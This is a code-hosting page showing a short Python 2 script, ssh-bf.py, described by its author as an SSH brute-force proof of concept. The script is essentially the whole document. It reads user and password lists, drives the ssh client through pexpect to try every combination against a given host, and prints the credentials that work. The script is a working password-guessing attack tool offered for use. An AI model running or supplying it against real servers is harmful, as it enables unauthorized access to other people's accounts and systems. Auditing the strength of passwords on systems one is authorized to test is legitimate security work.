-
Notifications
You must be signed in to change notification settings - Fork 0
/
ssh-bf.py
executable file
·62 lines (51 loc) · 1.32 KB
/
ssh-bf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/python
'''
@author: m_101
@year : 2012
@desc : ssh bruteforce poc wip
'''
import pexpect
import sys
def get_content(filename):
try:
fp = open(filename, 'r')
except Exception:
return None
content = fp.read()
fp.close()
return content
if len(sys.argv) != 4:
print "Usage: %s host user/userFile password/passFile" % sys.argv[0]
exit(1)
(progname, host, userlist, passlist) = sys.argv
users = []
passwords = []
# user(s)
u_content = get_content(userlist)
if u_content == None:
users = [ userlist ]
else:
users = u_content.split('\n')
# password(s)
p_content = get_content(passlist)
if p_content == None:
passwords = [ passlist ]
else:
passwords = p_content.split('\n')
for user in users:
for password in passwords:
child = pexpect.spawn('ssh ' + user + '@' + host)
child.expect ('password:')
child.sendline (password)
# check bad/good result
try:
result = child.expect (['denied', user, pexpect.EOF], timeout=10)
if result == 0:
child.kill(0)
elif result == 1:
print "found: %s : %s on %s" % (user, password, host)
break
elif result == 2:
print child.before
except Exception:
print "didn't get that"